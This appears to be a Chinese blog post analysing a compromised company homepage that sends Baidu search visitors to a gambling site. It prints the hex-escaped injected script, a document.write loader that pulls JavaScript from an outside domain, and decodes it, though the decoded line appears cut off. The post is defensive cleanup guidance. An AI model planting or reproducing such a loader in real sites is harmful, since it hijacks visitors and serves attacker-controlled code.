上午上q,刚登上去,老铁跟我讲被欺负了,网站从百度搜索进去,首页发生跳转到菠菜(博彩)网,开发公司的说可能是百度的问题,不是我们的问题,这种判断能力我只能说智商堪忧,又是xxxxx的网站开发公司。
直接进入正题,直接site:www.zyisolar.com
打开首页发生了跳转,到https://www.365da8s.com/zh-cn/这个菠菜,其他页面没有,劫持代码只放在首页,我们直接看代码
如果是无法直接从首页查看源码的情况,那么在浏览器输入view-source:域名 就可以查看网页源码
只需要看头部代码好熟悉,黑帽seo这行技术这几年也没什么创新,删除这两行就可以解决基本问题
Keywords和description进行Unicode解码,结果:
bet365官方平台开户,bet365官方备用网址,bet365官方网站是多少,bet365官方亚洲版,bet365.com官方网站,bet365官方投注,bet365官方网站,bet365官方中文版,bet365中文官方网站,英国bet365官方网,bet365官方投注网站,bet365官方投注网址,bet365官方网投,bet365官方备用,bet365官方网站是多
这段意思就是判断百度搜索访问用户进行跳转,你去360,搜狗搜索访问肯定是不会发生跳转的
然后我们再来解最后一段代码
先进行js解压,得出结果
1:\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74 结果 document
2:\\x77\\x72\\x69\\x74\\x65 结果 write
3:\\x3c\\x73\\x63\\x72\\x69\\x70\\x74 \\x74\\x79\\x70\\x65\\x3d\\x22\\x74\\x65\\x78\\x74\\x2f\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x22\\x73\\x72\\x63\\x3d\\x22\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x77\\x77\\x77\\x2e\\x62\\x63\\x64\\x61\\x73\\x38\\x2e\\x63\\x6f\\x6d\\x2f\\x33\\x36\\x35\\x2e\\x6a\\x73\\x22\\x3e\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e
结果
整段的解密结果就是:
');
到了这里整个过程已经很清晰了,虽然我们删除了这段代码但只能暂时解决问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是通过目前已经开放的漏洞,所以相对还是比较容易处理
大多数人对网站的理解还停留在视觉层面,网络安全的重要性反而被忽视,曾经我也主攻过渗透攻防,以打击菠菜(博彩)和成人色情,传销等网站服务器为乐,我涉及这块技术的目的不是为了干点什么,而是为了解决问题。任何公司需要提高对网络安全的重视,找网络开发公司也要避免入坑